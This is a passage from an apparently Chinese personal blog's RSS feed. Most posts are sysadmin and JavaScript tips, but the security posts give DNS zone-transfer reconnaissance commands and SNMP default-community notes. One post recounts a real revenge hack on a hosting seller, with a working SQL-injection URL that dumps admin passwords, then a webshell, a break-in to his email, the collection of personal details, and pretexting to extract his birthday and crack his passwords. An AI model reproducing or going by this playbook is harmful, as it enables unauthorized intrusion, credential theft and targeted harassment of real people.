<p class="a1" style="MARGIN: 0cm 0cm 6pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">寻找测试系统也是攻击者们偏爱的选择之一。原因很简单：测试系统通常不怎么启动众多的安全特性，口令字往往易于猜到，而且管理员也一般不关心谁登录进来。这确实是个&ldquo;无照营业者&rdquo;的完美之家。我们可以如下所示搜索测试系统：</span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><span lang="EN-US"><font face="Courier New">[bash]$ <strong style="mso-bidi-font-weight: normal">grep -i test /tmp/zone_out |wc-l</strong></font></span></font></p>
<p class="a" style="MARGIN: 0cm 21.25pt 0pt"><font size="2"><strong style="mso-bidi-font-weight: normal"><span lang="EN-US"><font face="Courier New"><span style="mso-spacerun: yes">&nbsp;&nbsp;&nbsp; </span>96</font></span></strong></font></p>
<p class="a2" style="MARGIN: 6pt 0cm 0pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">可以看出，该区域文件中约有</span><span lang="EN-US"><font face="Times New Roman">96</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">个含有&ldquo;</span><span lang="EN-US"><font face="Times New Roman">test</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">&rdquo;一词的项。这应该等同于相当数量的实际测试系统。以上只是一些简单的例子。大多数入侵者会分割区域数据以瞄准具有已知脆弱点的特定系统类型。</span></font></p>
<p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">这里有两点需要注意。首先，前面谈及的方法一次只查询一个名字服务器。这意味着不得不对目标域名的所有权威名字服务器执行完全相同的任务。另外，我们只是查询了</span><span lang="EN-US"><font face="Times New Roman">Tellurian.net</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">域。如果存在子域，我们又不得不给每个子域（例如</span><span lang="EN-US"><font face="Times New Roman">greenhouse.Tellurian.net</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">）执行同样类型的查询。其次，你可能会收到一个消息，声称你不能罗列域名数据或者查询被拒绝。这通常表示目标域名服务器已被配置成不允许未经授权的用户执行区域传送。这么一来你不能再从该服务器执行区域传送，不过要是存在多个</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">服务器，你仍有可能找到一个允许区域传送的服务器。</span></font></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt;"><font size="2"><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">介绍完手动进行</span><span lang="EN-US"><font face="Times New Roman">DNS</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">查询的方法之后，我们再向大家介绍几个可以自动完成这一查询的工具。这类工具有很多，</span><span lang="EN-US"><font face="Times New Roman">host</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">、</span><span lang="EN-US"><font face="Times New Roman">Sam Spade</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">、</span><span lang="EN-US"><font face="Times New Roman">axfr</font></span><span style="FONT-FAMILY: 宋体; mso-ascii-font-family: -Times New Roman-; mso-hansi-font-family: -Times New Roman-">和</span><span lang="EN-US"><font face="Times New Roman">dig</font></span><span style="font-family: 宋体;">是其中比较常见的。</span></font></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt;"><font size="2">&nbsp;</font></p>
<p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt"><font size="2"><span id="userCommentList">1. 在Windows上面，可以用如下方法遍历记录: nslookup 将server指定到对方的dns server 使用命令ls -d  domain.com 如果对方没有设定安全的区域传送或者禁用区域传送，这样整个DNS记录将完全暴露出来。    2.在Linux上面，以Redhat为例，可以使用: dig axfr @IP-address domain.com  IP-address为对方DNS的Server 这样也可以遍历出对方的记录。</span></font></p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=42" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=42</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2011-10-30 15:13</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=40</guid>
			<title>SNMP默认团组名</title>
			<author>admin</author>
			<description><![CDATA[<p>验证SNMP默认团组名的漏洞：</p>
<p>默认为public，可泄漏一些系统，用户和共享信息</p>
<p>private权限就比较大，相对危害也比较大。</p>
<p>验证工具</p>
<p>SNSCAN</p>
<p>MIB</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=40" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=40</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2011-09-19 16:56</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=39</guid>
			<title>php版本检测插件</title>
			<author>admin</author>
			<description><![CDATA[<p>记录下</p>
<p>http://hi.baidu.com/rayh4c/blog/item/0214d0c48a8ecad039db498e.html</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=39" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=39</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2011-09-14 20:45</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=38</guid>
			<title>ERROR 2002 (HY000): 错误解决办法</title>
			<author>admin</author>
			<description><![CDATA[<p>ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)</p>
<p>解决办法</p>
<p>sudo /etc/init.d/mysql restart 重启mysql服务器</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=38" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=38</link>
			<category domain="http://www.normb.net/?cid=3">Database</category>
			<pubDate>2011-08-29 20:05</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=37</guid>
			<title>关于社会工程学案例的思考</title>
			<author>admin</author>
			<description><![CDATA[<p>此事还要从被忽悠开始,一个卖IDC的忽悠我,虽然没有骗到钱,但是让我内心十分不悦,所以萌发了看看他究竟是什么货色的想法,姑且可以说由被忽悠引发的血案.</p>
<p>那么社工一个我不了解的人,应该怎么做?</p>
<p><strong style="background-color: rgb(255, 0, 0);">信息收集,资源积累</strong>------&gt;<span style="background-color: rgb(255, 255, 0);">寻找切入点,技术辅助</span>------&gt;<span style="background-color: rgb(255, 153, 0);">打开突破口,深挖信息</span>------&gt;<span style="background-color: rgb(128, 0, 128);">直接,间接接触,直取目标</span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">1.信息收集,资源积累.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">信息收集所指的是由单一的已知信息而引发的垂直信息的获取,比如QQ资料,QQ资料中个人网站和Email等等信息,还有由此而引发的搜索引擎的关键字搜索.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">资源积累主要是技术积累,人肉库,0day存储不就是在这个范畴内吗.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">本案例中,已知信息为一个QQ号码32XXX3429</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">通过google搜索得知其EMAIL,个人运营网站,姓名,家庭住址等信息.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">2.</span></span><span style="background-color: rgb(255, 255, 255);">寻找切入点,技术辅助</span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">通过对其个人运营的IDC网站进行了旁注渗透,拿到个旁注站点的webshell,用的是网趣购物系统后台管理,搜索发现其存在注射漏洞.</span></span></p>
<p style="background-color: rgb(255, 255, 255);">admin/review.asp?id=50%20and%201=2%20union%20select%201,2,admin,4,password,6,7,8,9,10,11%20from%20admin</p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">webshell里面标准的虚拟主机设置,非常难提权.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">那么切入点在哪?</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">任何搜索和得到的信息,只要是准确的,必然有关联,翻阅搜索记录的文档,看到目标对应的Email存在的whios信息,发现通过改邮箱注册的一个域名跟我 拿  到webshell在同一个服务器上,虽然webshell很难提权,但是有webshell不就可以查看到目标邮箱注册的域名的后台的数据库,密码的通  用性?这就是个切入点.<br />
</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">3.</span></span><span style="background-color: rgb(255, 255, 255);">打开突破口,深挖信息</span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">通过webshell操作,得到后台密码,尝试进入Email,成功.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">打开了突破口,下面就看深挖获取更多的信息,将战果扩大化.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">翻阅邮箱得到了更多其个人资料和一些于之相关的信息,让我对这个人有了更多的了解.整理手上的资料.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">4.</span></span><span style="background-color: rgb(255, 255, 255);">直接,间接接触,直取目标</span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">现在考虑直接跟目标接触,因为有之前的资源和信息的储备,所以聊天也有目的性.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">首先假装跟其买空间,然后很顺利的跟他扯上老乡的关系(储备信息中得到过其个人详细资料),然后跟他有扯上高中校友,因为之前做过功课,连他读的高中的位置在哪里,哪个老师都做过记录,所以聊起来很顺利.很快就获得了他的信任.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">沟通是间断的,为了就是避免引起怀疑.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">过了2-3天,借着业务需求又跟他聊上了.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">我:你是哪个星座的呀.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">目标:巨蟹座阿</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">我:我靠,我也是巨蟹座的.你巨蟹座哪一天阿...</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">目标:28号阿</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">我:哈哈,那你小一点阿..</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">.......</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">顺利拿到其生日,通过姓名和生日,手机组合,拿到目标各种密码.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">当然上面说的只是一种套信息的思路,更多思路要靠个人积累和思考,始终要明白一点,别人在明,你在暗,个人操作的空间很大.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">沟通也是一门艺术,把目标当朋友,只有在角色中,看戏和演戏的人才能逼真.</span></span></p>
<p><span style="background-color: rgb(128, 0, 128);"><span style="background-color: rgb(255, 255, 255);">抛砖引玉,亦做总结和思考.<br />
</span></span></p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=37" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=37</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2011-07-15 22:16</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=36</guid>
			<title>MAC系统中&quot;不能完成此操作，因为项目xxx已被锁定&quot;的解决办法。</title>
			<author>admin</author>
			<description><![CDATA[<p>如果要尝试解锁的项目是文件夹，请执行以下步骤：<br />
打开&ldquo;终端&rdquo;(/Applications/Utilities)。 <br />
键入以下命令（后跟一个空格）： sudo chflags -R nouchg <br />
将要解锁的文件夹拖入到&ldquo;终端&rdquo;窗口中。 <br />
按 Return 键。 输入密码，然后按 Return 键。</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=36" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=36</link>
			<category domain="http://www.normb.net/?cid=5">MacBook</category>
			<pubDate>2011-07-13 17:55</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=35</guid>
			<title>bash下获取root权限</title>
			<author>admin</author>
			<description><![CDATA[1.修改root密码
sudo root,直接修改root密码

2.不修改root密码
sudu bash,只是临时获取root权限,密码为当前用户密码<br /><br /><a href="http://www.normb.net/?action=show&amp;id=35" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=35</link>
			<category domain="http://www.normb.net/?cid=5">MacBook</category>
			<pubDate>2011-07-03 10:56</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=34</guid>
			<title>临时想法－笔记</title>
			<author>admin</author>
			<description><![CDATA[<p>当进入一个目标，假设这个目标不单单只是一个website或者database，一个整体，案例中，拿到目标中的A的信息，A是一个website，那么想进入这个目标的B块区，搜集B的公网上的信息或者在目标中的信息，然后利用A的数据库去进行猜解，看似不相关的A,B，当管理员共同管理或者有着帐号和其他之类的共性的时候，往往有想不到的收获。</p>
<p>简单的说，A是一个dz论坛，很久没人管，拿到了A的webshell，想进入B，发现B也有dz，不过B的dz的数据量比较大，一筹莫展的时候，想起来，可以在B上查看哪些是管理员，然后在A的数据库里面查询密码，管理员弱小的失误，用安全防护的角度来看</p>
<p>1.对于企业来说，废弃业务要及时关闭，或者设置权限，不让任意访问</p>
<p>2.管理员的密码意识</p>
<p>3.不同的业务的帐号不能具有通用性，比如A上是coldfire，B上也是coldfire。越特别越容易引起人的注意</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=34" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=34</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2011-06-28 03:06</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=33</guid>
			<title>mac下的windows虚拟机摄像头安装问题</title>
			<author>admin</author>
			<description><![CDATA[<p>虚拟机设置－usb－applebuiltinisight打钩－无视弹出来的查找驱动提示－安装AppleiSightInstaller.exe－over</p>
<p>&nbsp;</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=33" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=33</link>
			<category domain="http://www.normb.net/?cid=5">MacBook</category>
			<pubDate>2011-06-14 22:29</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=32</guid>
			<title>在mac中以root权限运行程序</title>
			<author>admin</author>
			<description><![CDATA[<p>在mac中以root权限运行程序命令<br />
<br />
sudo (后接命令)</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=32" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=32</link>
			<category domain="http://www.normb.net/?cid=5">MacBook</category>
			<pubDate>2011-02-24 02:26</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=31</guid>
			<title>vmware中NAT的问题</title>
			<author>admin</author>
			<description><![CDATA[<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">这几天vmware中装了个en的xp做测试用，不知道什么原因，给en的xp开了3389，死活连不上。</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">首先排除了防火墙的原因，在虚拟机里面用nc监听了任意一个端口，然后本机telnet是可行了。（开始我启用的是桥接模式）</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">后来怒了，启用NAT总可以吧，然后NAT死活自动分配不到ip，更怒了。。。</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">逼着我自己手工去分配NAT模式的ip这个总可以吧。然后想了想，NAT模式的ip怎么分配来着。。。</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">启用一个正常的虚拟机，然后启用NAT模式，看它的ip怎么分配的，然后依着葫芦画瓢终于搞定了。</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">搞完了以后想了下 其实自己只是在解决问题，为什么ip是这么分配的，这几个模式之间的区别应该在原理上了解，而不是在应用层面上去区分。</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">以后搞东西的时候多想想</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">问题解决的方法是：</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">手动修改ip：</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">192.168.xxx.xxx（vmware中网卡的ip的c段）</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">255.255.255.0</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">192.168.xxx.2</span></span></font></p>
<p><font size="2"><span style="widows: 2; text-transform: none; text-indent: 0px; border-collapse: separate; font: medium STHeiti; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0,0,0); word-spacing: 0px" class="Apple-style-span"><span style="text-align: left; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px" class="Apple-style-span">记一笔，对于模式的区别，后续查看资料以后补一篇日志，测试东西去。</span></span></font></p>
<p>&nbsp;</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=31" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=31</link>
			<category domain="http://www.normb.net/?cid=4">System</category>
			<pubDate>2010-09-28 03:13</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=30</guid>
			<title>getElementById() 和 getElementsByTagName()</title>
			<author>admin</author>
			<description><![CDATA[<p><font size="2">getElementById()  和 getElementsByTagName() 这两种方法，可查找整个 HTML 文档中的任何 HTML 元素。</font></p>
<p><font size="2"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span">
<p style="margin: 12px 0px 0px; line-height: 18px;">这两种方法会忽略文档的结构。假如您希望查找文 档 中所有的 &lt;p&gt; 元素，getElementsByTagName() 会把它们全部找到，不管 &lt;p&gt;  元素处于文档中的哪个层次。同时，getElementById() 方法也会返回正确的元素，不论它被隐藏在文档结构中的什么位置。</p>
<p style="margin: 12px 0px 0px; line-height: 18px;">这两种方法会像您提供任何你所需要的 HTML  元素，不论它们在文档中所处的位置！</p>
<meta charset="utf-8" /><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span">
<meta charset="utf-8" /><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span">
<h3 style="font-weight: bold; margin: 20px 0px 0px; padding: 0px; font-size: 12px;">getElementById() 语法</h3>
<pre style="width: 580px; margin: 10px 0px 0px; padding: 10px; border: 1px dotted rgb(119, 136, 85); background-color: rgb(245, 245, 245); font-family: 'Courier New',monospace; font-size: 12px;">document.getElementById(&quot;ID&quot;);</pre>
<p style="margin: 12px 0px 0px; line-height: 18px;" class="note">
<meta charset="utf-8" /><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span">
<h3 style="font-weight: bold; margin: 20px 0px 0px; padding: 0px; font-size: 12px;">getElementsByTagName() 语法</h3>
<pre style="width: 580px; margin: 10px 0px 0px; padding: 10px; border: 1px dotted rgb(119, 136, 85); background-color: rgb(245, 245, 245); font-family: 'Courier New',monospace; font-size: 12px;">document.getElementsByTagName(&quot;标签名称&quot;);</pre>
<p style="margin: 12px 0px 0px; line-height: 18px;"><strong>getElementById() 和  getElementsByTagName()的区别在于:</strong></p>
<p style="margin: 12px 0px 0px; line-height: 18px;"><font size="2"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span">getElementById(),  一次只能访问一个节点,原因是它是以html中的id作为选择条件</span></span></span></span></span></span></span></span></font></p>
<p style="margin: 12px 0px 0px; line-height: 18px;"><font size="2"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span">getElementsByTagName(),  它是以标签作为选择条件</span></span></span></span></span></span></span></span></font></p>
<p style="margin: 12px 0px 0px; line-height: 18px;"><font size="2"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" 